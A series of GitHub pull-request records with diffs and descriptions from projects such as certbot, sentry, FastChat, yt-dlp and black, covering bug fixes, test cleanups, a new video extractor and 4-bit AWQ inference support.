--- a/acme/acme/client.py
+++ b/acme/acme/client.py
@@ -797,9 +797,13 @@ def finalize_order(self, orderr: messages.OrderResource, deadline: datetime.date
time.sleep(1)
response = self._post_as_get(orderr.uri)
body = messages.Order.from_json(response.json())
- if body.error is not None:
- raise errors.IssuanceError(body.error)
- if body.certificate is not None:
+ if body.status == messages.STATUS_INVALID:
+ if body.error is not None:
+ raise errors.IssuanceError(body.error)
+ raise errors.Error(
+ "The certificate order failed. No further information was provided "
+ "by the server.")
+ elif body.status == messages.STATUS_VALID and body.certificate is not None:
certificate_response = self._post_as_get(body.certificate)
orderr = orderr.update(body=body, fullchain_pem=certificate_response.text)
if fetch_alternative_chains:
diff --git a/acme/tests/client_test.py b/acme/tests/client_test.py
index 2eeceee18e1..27cb49a9e90 100644
--- a/acme/tests/client_test.py
+++ b/acme/tests/client_test.py
@@ -822,7 +822,8 @@ def test_poll_authorizations_success(self):
def test_finalize_order_success(self):
updated_order = self.order.update(
- certificate='https://www.letsencrypt-demo.org/acme/cert/')
+ certificate='https://www.letsencrypt-demo.org/acme/cert/',
+ status=messages.STATUS_VALID)
updated_orderr = self.orderr.update(body=updated_order, fullchain_pem=CERT_SAN_PEM)
self.response.json.return_value = updated_order.to_json()
@@ -832,12 +833,22 @@ def test_finalize_order_success(self):
self.assertEqual(self.client.finalize_order(self.orderr, deadline), updated_orderr)
def test_finalize_order_error(self):
- updated_order = self.order.update(error=messages.Error.with_code('unauthorized'))
+ updated_order = self.order.update(
+ error=messages.Error.with_code('unauthorized'),
+ status=messages.STATUS_INVALID)
self.response.json.return_value = updated_order.to_json()
deadline = datetime.datetime(9999, 9, 9)
self.assertRaises(errors.IssuanceError, self.client.finalize_order, self.orderr, deadline)
+ def test_finalize_order_invalid_status(self):
+ # https://github.com/certbot/certbot/issues/9296
+ order = self.order.update(error=None, status=messages.STATUS_INVALID)
+ self.response.json.return_value = order.to_json()
+ with self.assertRaises(errors.Error) as error:
+ self.client.finalize_order(self.orderr, datetime.datetime(9999, 9, 9))
+ self.assertIn("The certificate order failed", str(error.exception))
+
def test_finalize_order_timeout(self):
deadline = datetime.datetime.now() - datetime.timedelta(seconds=60)
self.assertRaises(errors.TimeoutError, self.client.finalize_order, self.orderr, deadline)
@@ -845,6 +856,7 @@ def test_finalize_order_timeout(self):
def test_finalize_order_alt_chains(self):
updated_order = self.order.update(
certificate='https://www.letsencrypt-demo.org/acme/cert/',
+ status=messages.STATUS_VALID
)
updated_orderr = self.orderr.update(body=updated_order,
fullchain_pem=CERT_SAN_PEM,
diff --git a/certbot/CHANGELOG.md b/certbot/CHANGELOG.md
index ba307eae631..ba45d46e40a 100644
--- a/certbot/CHANGELOG.md
+++ b/certbot/CHANGELOG.md
@@ -10,7 +10,9 @@ Certbot adheres to [Semantic Versioning](https://semver.org/).
### Changed
-*
+* A change to order finalization has been made to the `acme` module and Certbot:
+ - An order's `certificate` field will only be processed if the order's `status` is `valid`.
+ - An order's `error` field will only be processed if the order's `status` is `invalid`.
### Fixed
| Rather than deducing the status of an order from the "certificate"
and "error" fields, use the "status" field directly.
----
Fixes #9296.
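The resulting control flow, condensed from the patch:

```python
body = messages.Order.from_json(response.json())
if body.status == messages.STATUS_INVALID:
    if body.error is not None:
        raise errors.IssuanceError(body.error)
    raise errors.Error(
        "The certificate order failed. No further information was provided "
        "by the server.")
elif body.status == messages.STATUS_VALID and body.certificate is not None:
    ...  # only now is the certificate URL downloaded
```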
| https://api.github.com/repos/certbot/certbot/pulls/9297 | 2022-05-10T11:46:56Z | 2022-05-13T16:51:11Z | 2022-05-13T16:51:11Z | 2022-05-13T16:51:14Z | 976 | certbot/certbot | 96 |
fix(tests) Clean up tests that were used to debug snuba inconsistency | diff --git a/tests/snuba/api/endpoints/test_organization_events_v2.py b/tests/snuba/api/endpoints/test_organization_events_v2.py
index f819165dab6a1..0ab0949f0b6d9 100644
--- a/tests/snuba/api/endpoints/test_organization_events_v2.py
+++ b/tests/snuba/api/endpoints/test_organization_events_v2.py
@@ -1,7 +1,6 @@
from __future__ import absolute_import
import six
-import pytest
import random
import mock
@@ -2517,24 +2516,26 @@ def test_messed_up_function_values(self):
data = response.data["data"]
assert len(data) == 0
- def test_context_fields(self):
+ def test_context_fields_between_datasets(self):
self.login_as(user=self.user)
project = self.create_project()
- data = load_data("android")
+ event_data = load_data("android")
transaction_data = load_data("transaction")
- data["spans"] = transaction_data["spans"]
- data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
- data["type"] = "transaction"
- data["transaction"] = "/failure_rate/1"
- data["timestamp"] = iso_format(before_now(minutes=1))
- data["start_timestamp"] = iso_format(before_now(minutes=1, seconds=5))
- data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
- data["contexts"]["http"] = {
+ event_data["spans"] = transaction_data["spans"]
+ event_data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
+ event_data["type"] = "transaction"
+ event_data["transaction"] = "/failure_rate/1"
+ event_data["timestamp"] = iso_format(before_now(minutes=1))
+ event_data["start_timestamp"] = iso_format(before_now(minutes=1, seconds=5))
+ event_data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
+ event_data["contexts"]["http"] = {
"method": "GET",
"referer": "something.something",
"url": "https://areyouasimulation.com",
}
- self.store_event(data, project_id=project.id)
+ self.store_event(event_data, project_id=project.id)
+ event_data["type"] = "error"
+ self.store_event(event_data, project_id=project.id)
fields = [
"http.method",
@@ -2555,99 +2556,24 @@ def test_context_fields(self):
"device.uuid",
]
- with self.feature("organizations:discover-basic"):
- response = self.client.get(
- self.url,
- format="json",
- data={"field": fields + ["count()"], "query": "event.type:transaction"},
- )
-
- assert response.status_code == 200, response.content
- assert len(response.data["data"]) == 1
- results = response.data["data"]
-
- for field in fields:
- key, value = field.split(".", 1)
- expected = data["contexts"][key][value]
-
- # TODO (evanh) There is a bug in snuba right now where if a promoted column is used for a boolean
- # value, it returns "1" or "0" instead of "True" and "False" (not that those make more sense)
- if expected in (True, False):
- expected = six.text_type(expected)
- # All context columns are treated as strings, regardless of the type of data they stored.
- elif isinstance(expected, six.integer_types):
- expected = "{:g}".format(expected)
-
- assert results[0][field] == expected
- assert results[0]["count"] == 1
-
- @pytest.mark.xfail(reason="these fields behave differently between the types of events")
- def test_context_fields_in_errors(self):
- self.login_as(user=self.user)
- project = self.create_project()
- data = load_data("android")
- transaction_data = load_data(
- "transaction",
- timestamp=before_now(minutes=1),
- start_timestamp=before_now(minutes=1, seconds=5),
- )
- data["spans"] = transaction_data["spans"]
- data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
- data["type"] = "error"
- data["transaction"] = "/failure_rate/1"
- data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
- data["contexts"]["http"] = {
- "method": "GET",
- "referer": "something.something",
- "url": "https://areyouasimulation.com",
- }
- self.store_event(data, project_id=project.id)
-
- fields = [
- "http.method",
- "http.referer",
- "http.url",
- "os.build",
- "os.kernel_version",
- "device.arch",
- "device.battery_level",
- "device.brand",
- "device.charging",
- "device.locale",
- "device.model_id",
- "device.name",
- "device.online",
- "device.orientation",
- "device.simulator",
- "device.uuid",
+ data = [
+ {"field": fields + ["location", "count()"], "query": "event.type:error"},
+ {"field": fields + ["duration", "count()"], "query": "event.type:transaction"},
]
- with self.feature("organizations:discover-basic"):
- response = self.client.get(
- self.url,
- format="json",
- data={"field": fields + ["count()"], "query": "event.type:error"},
- )
-
- assert response.status_code == 200, response.content
- assert len(response.data["data"]) == 1
- results = response.data["data"]
-
- for field in fields:
- key, value = field.split(".", 1)
- expected = data["contexts"][key][value]
-
- # TODO (evanh) There is a bug in snuba right now where if a promoted column is used for a boolean
- # value, it returns "1" or "0" instead of "True" and "False" (not that those make more sense)
- if expected in (True, False):
- expected = six.text_type(expected)
- # All context columns are treated as strings, regardless of the type of data they stored.
- elif isinstance(expected, six.integer_types):
- expected = "{:.1f}".format(expected)
-
- assert results[0][field] == expected
+ for datum in data:
+ with self.feature("organizations:discover-basic"):
+ response = self.client.get(self.url, format="json", data=datum)
- assert results[0]["count"] == 1
+ assert response.status_code == 200, response.content
+ assert len(response.data["data"]) == 1, datum
+ results = response.data["data"]
+ assert results[0]["count"] == 1, datum
+
+ for field in fields:
+ key, value = field.split(".", 1)
+ expected = six.text_type(event_data["contexts"][key][value])
+ assert results[0][field] == expected, field + six.text_type(datum)
def test_histogram_function(self):
self.login_as(user=self.user)
| These tests were originally put in place to debug the issue solved by
https://github.com/getsentry/snuba/pull/846. I left the tests in just to catch
any possible regressions. | https://api.github.com/repos/getsentry/sentry/pulls/20172 | 2020-08-11T15:57:07Z | 2020-08-12T16:06:52Z | 2020-08-12T16:06:52Z | 2020-12-18T13:00:38Z | 1,692 | getsentry/sentry | 43,824 |
Handle empty message tree state | diff --git a/website/src/components/Stats/Stats.tsx b/website/src/components/Stats/Stats.tsx
index f12cafa609..39755d9d33 100644
--- a/website/src/components/Stats/Stats.tsx
+++ b/website/src/components/Stats/Stats.tsx
@@ -30,6 +30,11 @@ export const Stats = ({ data }: StatsProps) => {
const messageTreeStats = getStatByName("message_trees_states_by_lang");
+ // this will be empty on a fresh db:
+ if (!messageTreeStats) {
+ return null;
+ }
+
return (
<>
<Heading size="lg" className="pb-4">
| This problem happens when running with a fresh DB setup: the returned tree is empty. | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/1838 | 2023-02-24T13:12:44Z | 2023-02-24T13:19:47Z | 2023-02-24T13:19:47Z | 2023-02-24T13:19:48Z | 158 | LAION-AI/Open-Assistant | 37,058 |
[vimeo] Ignore video 'base' thumbnail (Closes #3438) | diff --git a/youtube_dl/extractor/vimeo.py b/youtube_dl/extractor/vimeo.py
index 10844f39e68..11c7d7e817f 100644
--- a/youtube_dl/extractor/vimeo.py
+++ b/youtube_dl/extractor/vimeo.py
@@ -276,7 +276,7 @@ def _real_extract(self, url):
if video_thumbnail is None:
video_thumbs = config["video"].get("thumbs")
if video_thumbs and isinstance(video_thumbs, dict):
- _, video_thumbnail = sorted((int(width), t_url) for (width, t_url) in video_thumbs.items())[-1]
+ _, video_thumbnail = sorted((int(width if width.isdigit() else 0), t_url) for (width, t_url) in video_thumbs.items())[-1]
# Extract video description
video_description = None
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3441 | 2014-08-04T19:37:53Z | 2014-08-05T12:07:05Z | 2014-08-05T12:07:05Z | 2014-08-05T13:06:37Z | 201 | ytdl-org/youtube-dl | 49,876 |
|
Remove unnecessary comma | diff --git a/scrapy/resolver.py b/scrapy/resolver.py
index 554a3a14dba..f69894b1e4e 100644
--- a/scrapy/resolver.py
+++ b/scrapy/resolver.py
@@ -29,7 +29,7 @@ def from_crawler(cls, crawler, reactor):
cache_size = 0
return cls(reactor, cache_size, crawler.settings.getfloat('DNS_TIMEOUT'))
- def install_on_reactor(self,):
+ def install_on_reactor(self):
self.reactor.installResolver(self)
def getHostByName(self, name, timeout=None):
| https://api.github.com/repos/scrapy/scrapy/pulls/4369 | 2020-02-23T21:30:10Z | 2020-02-24T11:02:01Z | 2020-02-24T11:02:01Z | 2020-02-26T12:34:29Z | 140 | scrapy/scrapy | 34,967 |
|
Add AWQ 4bit inference support | diff --git a/docs/awq.md b/docs/awq.md
new file mode 100644
index 0000000000..ac38ef3dd5
--- /dev/null
+++ b/docs/awq.md
@@ -0,0 +1,71 @@
+# AWQ 4bit Inference
+
+We integrated [AWQ](https://github.com/mit-han-lab/llm-awq) into FastChat to provide **efficient and accurate** 4bit LLM inference.
+
+## Install AWQ
+
+Setup environment (please refer to [this link](https://github.com/mit-han-lab/llm-awq#install) for more details):
+```bash
+conda create -n fastchat-awq python=3.10 -y
+conda activate fastchat-awq
+# cd /path/to/FastChat
+pip install --upgrade pip # enable PEP 660 support
+pip install -e . # install fastchat
+
+git clone https://github.com/mit-han-lab/llm-awq repositories/llm-awq
+cd repositories/llm-awq
+pip install -e . # install awq package
+
+cd awq/kernels
+python setup.py install # install awq CUDA kernels
+```
+
+## Chat with the CLI
+
+```bash
+# Download quantized model from huggingface
+# Make sure you have git-lfs installed (https://git-lfs.com)
+git lfs install
+git clone https://huggingface.co/mit-han-lab/vicuna-7b-v1.3-4bit-g128-awq
+
+# You can specify which quantized model to use by setting --awq-ckpt
+python3 -m fastchat.serve.cli \
+ --model-path models/vicuna-7b-v1.3-4bit-g128-awq \
+ --awq-wbits 4 \
+ --awq-groupsize 128
+```
+
+## Benchmark
+
+* Through **4-bit weight quantization**, AWQ helps to run larger language models within the device memory restriction and prominently accelerates token generation. All benchmarks are done with group_size 128.
+
+* Benchmark on NVIDIA RTX A6000:
+
+ | Model | Bits | Max Memory (MiB) | Speed (ms/token) | AWQ Speedup |
+ | --------------- | ---- | ---------------- | ---------------- | ----------- |
+ | vicuna-7b | 16 | 13543 | 26.06 | / |
+ | vicuna-7b | 4 | 5547 | 12.43 | 2.1x |
+ | llama2-7b-chat | 16 | 13543 | 27.14 | / |
+ | llama2-7b-chat | 4 | 5547 | 12.44 | 2.2x |
+ | vicuna-13b | 16 | 25647 | 44.91 | / |
+ | vicuna-13b | 4 | 9355 | 17.30 | 2.6x |
+ | llama2-13b-chat | 16 | 25647 | 47.28 | / |
+ | llama2-13b-chat | 4 | 9355 | 20.28 | 2.3x |
+
+* NVIDIA RTX 4090:
+
+ | Model | AWQ 4bit Speed (ms/token) | FP16 Speed (ms/token) | AWQ Speedup |
+ | --------------- | ------------------------- | --------------------- | ----------- |
+ | vicuna-7b | 8.61 | 19.09 | 2.2x |
+ | llama2-7b-chat | 8.66 | 19.97 | 2.3x |
+ | vicuna-13b | 12.17 | OOM | / |
+ | llama2-13b-chat | 13.54 | OOM | / |
+
+* NVIDIA Jetson Orin:
+
+ | Model | AWQ 4bit Speed (ms/token) | FP16 Speed (ms/token) | AWQ Speedup |
+ | --------------- | ------------------------- | --------------------- | ----------- |
+ | vicuna-7b | 65.34 | 93.12 | 1.4x |
+ | llama2-7b-chat | 75.11 | 104.71 | 1.4x |
+ | vicuna-13b | 115.40 | OOM | / |
+ | llama2-13b-chat | 136.81 | OOM | / |
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index 897a0b8aa2..b465ce68c5 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -26,6 +26,7 @@
)
from fastchat.modules.gptq import GptqConfig, load_gptq_quantized
+from fastchat.modules.awq import AWQConfig, load_awq_quantized
from fastchat.conversation import Conversation, get_conv_template
from fastchat.model.compression import load_compress_model
from fastchat.model.model_chatglm import generate_stream_chatglm
@@ -150,11 +151,11 @@ def load_model(
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: Optional[GptqConfig] = None,
+ awq_config: Optional[AWQConfig] = None,
revision: str = "main",
debug: bool = False,
):
"""Load a model from Hugging Face."""
-
# get model adapter
adapter = get_model_adapter(model_path)
@@ -219,6 +220,29 @@ def load_model(
torch_dtype=kwargs["torch_dtype"],
revision=revision,
)
+ elif awq_config and awq_config.wbits < 16:
+ assert (
+ awq_config.wbits == 4
+ ), "Currently we only support 4-bit inference for AWQ."
+ model, tokenizer = load_awq_quantized(model_path, awq_config, device)
+ if num_gpus != 1:
+ device_map = accelerate.infer_auto_device_map(
+ model,
+ max_memory=kwargs["max_memory"],
+ no_split_module_classes=[
+ "OPTDecoderLayer",
+ "LlamaDecoderLayer",
+ "BloomBlock",
+ "MPTBlock",
+ "DecoderLayer",
+ ],
+ )
+ model = accelerate.dispatch_model(
+ model, device_map=device_map, offload_buffers=True
+ )
+ else:
+ model.to(device)
+ return model, tokenizer
elif gptq_config and gptq_config.wbits < 16:
model, tokenizer = load_gptq_quantized(model_path, gptq_config)
if num_gpus != 1:
@@ -370,6 +394,25 @@ def add_model_args(parser):
action="store_true",
help="Whether to apply the activation order GPTQ heuristic",
)
+ parser.add_argument(
+ "--awq-ckpt",
+ type=str,
+ default=None,
+ help="Load quantized model. The path to the local AWQ checkpoint.",
+ )
+ parser.add_argument(
+ "--awq-wbits",
+ type=int,
+ default=16,
+ choices=[4, 16],
+ help="#bits to use for AWQ quantization",
+ )
+ parser.add_argument(
+ "--awq-groupsize",
+ type=int,
+ default=-1,
+ help="Groupsize to use for AWQ quantization; default uses full row.",
+ )
def remove_parent_directory_name(model_path):
diff --git a/fastchat/modules/awq.py b/fastchat/modules/awq.py
new file mode 100644
index 0000000000..1f27be85c0
--- /dev/null
+++ b/fastchat/modules/awq.py
@@ -0,0 +1,85 @@
+from dataclasses import dataclass, field
+from pathlib import Path
+import sys
+
+import torch
+from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, modeling_utils
+
+
+@dataclass
+class AWQConfig:
+ ckpt: str = field(
+ default=None,
+ metadata={
+ "help": "Load quantized model. The path to the local AWQ checkpoint."
+ },
+ )
+ wbits: int = field(default=16, metadata={"help": "#bits to use for quantization"})
+ groupsize: int = field(
+ default=-1,
+ metadata={"help": "Groupsize to use for quantization; default uses full row."},
+ )
+
+
+def load_awq_quantized(model_name, awq_config: AWQConfig, device):
+ print("Loading AWQ quantized model...")
+
+ try:
+ from tinychat.utils import load_quant
+ from tinychat.modules import make_quant_norm, make_quant_attn, make_fused_mlp
+ except ImportError as e:
+ print(f"Error: Failed to import tinychat. {e}")
+ print("Please double check if you have successfully installed AWQ")
+ print("See https://github.com/lm-sys/FastChat/blob/main/docs/awq.md")
+ sys.exit(-1)
+
+ config = AutoConfig.from_pretrained(model_name, trust_remote_code=True)
+ tokenizer = AutoTokenizer.from_pretrained(
+ model_name, use_fast=False, trust_remote_code=True
+ )
+
+ def skip(*args, **kwargs):
+ pass
+
+ torch.nn.init.kaiming_uniform_ = skip
+ torch.nn.init.kaiming_normal_ = skip
+ torch.nn.init.uniform_ = skip
+ torch.nn.init.normal_ = skip
+ modeling_utils._init_weights = False
+
+ torch.set_default_dtype(torch.half)
+ model = AutoModelForCausalLM.from_config(config, trust_remote_code=True)
+
+ if any(name in find_awq_ckpt(awq_config) for name in ["llama", "vicuna"]):
+ model = load_quant.load_awq_llama_fast(
+ model,
+ find_awq_ckpt(awq_config),
+ awq_config.wbits,
+ awq_config.groupsize,
+ device,
+ )
+ make_quant_attn(model, device)
+ make_quant_norm(model)
+ make_fused_mlp(model)
+ else:
+ model = load_quant.load_awq_model(
+ model,
+ find_awq_ckpt(awq_config),
+ awq_config.wbits,
+ awq_config.groupsize,
+ device,
+ )
+ return model, tokenizer
+
+
+def find_awq_ckpt(awq_config: AWQConfig):
+ if Path(awq_config.ckpt).is_file():
+ return awq_config.ckpt
+
+ for ext in ["*.pt", "*.safetensors"]:
+ matched_result = sorted(Path(awq_config.ckpt).glob(ext))
+ if len(matched_result) > 0:
+ return str(matched_result[-1])
+
+ print("Error: AWQ checkpoint not found")
+ sys.exit(1)
diff --git a/fastchat/serve/cli.py b/fastchat/serve/cli.py
index 67735b0d67..12b6146a40 100644
--- a/fastchat/serve/cli.py
+++ b/fastchat/serve/cli.py
@@ -25,6 +25,7 @@
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.gptq import GptqConfig
+from fastchat.modules.awq import AWQConfig
from fastchat.serve.inference import ChatIO, chat_loop
@@ -206,6 +207,11 @@ def main(args):
groupsize=args.gptq_groupsize,
act_order=args.gptq_act_order,
),
+ AWQConfig(
+ ckpt=args.awq_ckpt or args.model_path,
+ wbits=args.awq_wbits,
+ groupsize=args.awq_groupsize,
+ ),
args.revision,
args.judge_sent_end,
args.debug,
diff --git a/fastchat/serve/inference.py b/fastchat/serve/inference.py
index ee8387bd3e..26feff2235 100644
--- a/fastchat/serve/inference.py
+++ b/fastchat/serve/inference.py
@@ -34,6 +34,7 @@
get_generate_stream_function,
)
from fastchat.modules.gptq import GptqConfig
+from fastchat.modules.awq import AWQConfig
from fastchat.utils import is_partial_stop, is_sentence_complete, get_context_length
@@ -284,6 +285,7 @@ def chat_loop(
max_new_tokens: int,
chatio: ChatIO,
gptq_config: GptqConfig,
+ awq_config: AWQConfig,
revision: str,
judge_sent_end: bool,
debug: bool,
@@ -298,6 +300,7 @@ def chat_loop(
load_8bit,
cpu_offloading,
gptq_config,
+ awq_config,
revision,
debug,
)
| <!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
<!-- Please give a short summary of the change and the problem this solves. -->
In this PR we introduce [AWQ](https://github.com/mit-han-lab/llm-awq) 4bit inference to FastChat. AWQ provides efficient and accurate low-bit weight quantization for LLMs, which helps to run larger language models within device memory limits and significantly accelerates token generation. For example, when running LLaMA-2-7b, AWQ delivers 2.3x and 1.4x speedups over the FP16 baseline on RTX 4090 and Jetson Orin, respectively.
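For reference, a hypothetical minimal sketch of the new loading path from Python (the checkpoint path is a placeholder; parameter names follow the signatures in this diff):

```python
from fastchat.model.model_adapter import load_model
from fastchat.modules.awq import AWQConfig

# Load a pre-quantized 4-bit checkpoint through the new awq_config argument.
model, tokenizer = load_model(
    model_path="models/vicuna-7b-v1.3-4bit-g128-awq",  # placeholder path
    device="cuda",
    num_gpus=1,
    awq_config=AWQConfig(
        ckpt="models/vicuna-7b-v1.3-4bit-g128-awq",  # the CLI falls back to model_path
        wbits=4,
        groupsize=128,
    ),
)
```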
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [x] I've made sure the relevant tests are passing (if applicable).
| https://api.github.com/repos/lm-sys/FastChat/pulls/2103 | 2023-07-28T03:37:40Z | 2023-08-01T10:09:19Z | 2023-08-01T10:09:19Z | 2023-08-01T10:09:19Z | 3,058 | lm-sys/FastChat | 41,113 |
[Fix] Fix compile error | diff --git a/op_builder/utils.py b/op_builder/utils.py
index cb528eea66a1..9412c725baab 100644
--- a/op_builder/utils.py
+++ b/op_builder/utils.py
@@ -197,11 +197,12 @@ def get_cuda_cc_flag() -> List[str]:
import torch
cc_flag = []
+ max_arch = ''.join(str(i) for i in torch.cuda.get_device_capability())
for arch in torch.cuda.get_arch_list():
res = re.search(r'sm_(\d+)', arch)
if res:
arch_cap = res[1]
- if int(arch_cap) >= 60:
+ if int(arch_cap) >= 60 and int(arch_cap) <= int(max_arch):
cc_flag.extend(['-gencode', f'arch=compute_{arch_cap},code={arch}'])
return cc_flag
| ## 📌 Checklist before creating the PR
- [x] I have created an issue for this PR for traceability
- [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [ ] I have added relevant tags if possible for us to better distinguish different PRs
## 🚨 Issue number
> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`
## 📝 What does this PR do?
`torch.cuda.get_arch_list()` here:
https://github.com/hpcaitech/ColossalAI/blob/5187c96b7c04ac6c794a58044533c874fa24e206/op_builder/utils.py#L200
returns the GPU architectures supported by the current PyTorch build. For example, if PyTorch 2.0 was built with support for the Hopper architecture, it will return a list like:
`['sm_37', 'sm_50', 'sm_60', 'sm_70', 'sm_75', 'sm_80', 'sm_86', 'sm_90']`
However, my GPU is an Ampere-architecture GPU, and returning a list that includes `sm_90` here causes a compile error like:
`nvcc fatal : Unsupported gpu architecture 'compute_90'`
Therefore, I think the valid arches returned here should be >= `sm_60` but <= `sm_86`, which is the highest arch available for my GPU.
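A minimal sketch of the fixed filtering, mirroring the change to `op_builder/utils.py` in this PR:

```python
import re

import torch

# Cap the emitted gencode flags at the compute capability of the GPU that is
# actually present, e.g. torch.cuda.get_device_capability() == (8, 6) -> '86'.
max_arch = ''.join(str(i) for i in torch.cuda.get_device_capability())

cc_flag = []
for arch in torch.cuda.get_arch_list():  # e.g. ['sm_37', ..., 'sm_90']
    res = re.search(r'sm_(\d+)', arch)
    if res and 60 <= int(res[1]) <= int(max_arch):
        cc_flag.extend(['-gencode', f'arch=compute_{res[1]},code={arch}'])

print(cc_flag)  # only arches that are buildable on the installed GPU
```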
## 💥 Checklist before requesting a review
- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented
## ⭐️ Do you enjoy contributing to Colossal-AI?
- [ ] 🌝 Yes, I do.
- [ ] 🌚 No, I don't.
Tell us more if you don't enjoy contributing to Colossal-AI.
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/4357 | 2023-07-31T13:02:10Z | 2023-09-01T10:12:58Z | 2023-09-01T10:12:58Z | 2023-09-01T10:12:58Z | 194 | hpcaitech/ColossalAI | 11,741 |
Add ParamountPlusSeriesIE. | diff --git a/yt_dlp/extractor/cbs.py b/yt_dlp/extractor/cbs.py
index ac3057d596f..716e945197b 100644
--- a/yt_dlp/extractor/cbs.py
+++ b/yt_dlp/extractor/cbs.py
@@ -1,5 +1,6 @@
from __future__ import unicode_literals
+from .common import InfoExtractor
from .theplatform import ThePlatformFeedIE
from ..utils import (
ExtractorError,
@@ -122,3 +123,39 @@ def _extract_video_info(self, content_id, site='cbs', mpx_acc=2198311517):
def _real_extract(self, url):
content_id = self._match_id(url)
return self._extract_video_info(content_id)
+
+
+class ParamountPlusSeriesIE(InfoExtractor):
+ _VALID_URL = r'https?://(?:www\.)?paramountplus\.com/shows/(?P<id>[a-zA-Z0-9-_]+)/?(?:[#?]|$)'
+ _TESTS = [{
+ 'url': 'https://www.paramountplus.com/shows/drake-josh',
+ 'playlist_mincount': 50,
+ 'info_dict': {
+ 'id': 'drake-josh',
+ }
+ }, {
+ 'url': 'https://www.paramountplus.com/shows/hawaii_five_0/',
+ 'playlist_mincount': 240,
+ 'info_dict': {
+ 'id': 'hawaii_five_0',
+ }
+ }, {
+ 'url': 'https://www.paramountplus.com/shows/spongebob-squarepants/',
+ 'playlist_mincount': 248,
+ 'info_dict': {
+ 'id': 'spongebob-squarepants',
+ }
+ }]
+ _API_URL = 'https://www.paramountplus.com/shows/{}/xhr/episodes/page/0/size/100000/xs/0/season/0/'
+
+ def _entries(self, show_name):
+ show_json = self._download_json(self._API_URL.format(show_name), video_id=show_name)
+ if show_json.get('success'):
+ for episode in show_json['result']['data']:
+ yield self.url_result(
+ 'https://www.paramountplus.com%s' % episode['url'],
+ ie=CBSIE.ie_key(), video_id=episode['content_id'])
+
+ def _real_extract(self, url):
+ show_name = self._match_id(url)
+ return self.playlist_result(self._entries(show_name), playlist_id=show_name)
diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index c0c613e14e9..e1212107352 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -202,7 +202,10 @@
CBCWatchIE,
CBCOlympicsIE,
)
-from .cbs import CBSIE
+from .cbs import (
+ CBSIE,
+ ParamountPlusSeriesIE,
+)
from .cbslocal import (
CBSLocalIE,
CBSLocalArticleIE,
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Closes https://github.com/yt-dlp/yt-dlp/issues/602
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/603 | 2021-08-01T10:09:58Z | 2021-08-01T21:28:48Z | 2021-08-01T21:28:48Z | 2021-08-06T14:36:41Z | 727 | yt-dlp/yt-dlp | 7,639 |
Set correct return statement for `is_type_comment` function | diff --git a/black.py b/black.py
index 65545e9f21d..d1e87a9fa98 100644
--- a/black.py
+++ b/black.py
@@ -2777,7 +2777,7 @@ def is_type_comment(leaf: Leaf, suffix: str = "") -> bool:
Only returns true for type comments for now."""
t = leaf.type
v = leaf.value
- return t in {token.COMMENT, t == STANDALONE_COMMENT} and v.startswith(
+ return t in {token.COMMENT, STANDALONE_COMMENT} and v.startswith(
"# type:" + suffix
)
| Looks like there is a mistake in the `is_type_comment` function.
When the function's return statement was updated from:
```python
return bool(
(t == token.COMMENT or t == STANDALONE_COMMENT) and (v.startswith("# type:"))
)
```
to
```python
return t in {token.COMMENT, t == STANDALONE_COMMENT} and v.startswith("# type:")
```
the set in the new version contains a comparison:
```python
{token.COMMENT, t == STANDALONE_COMMENT}
```
I think the set should be:
```python
{token.COMMENT, STANDALONE_COMMENT}
```
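A quick sketch (with made-up stand-in values for the token constants) of why the original set misbehaves:

```python
COMMENT = 60              # hypothetical stand-in for token.COMMENT
STANDALONE_COMMENT = 153  # hypothetical stand-in for black's STANDALONE_COMMENT

t = STANDALONE_COMMENT
# The buggy set is {60, True}, because t == STANDALONE_COMMENT evaluates to a
# boolean, so standalone comments are never matched:
print(t in {COMMENT, t == STANDALONE_COMMENT})  # False
# The fixed set checks membership against both token types directly:
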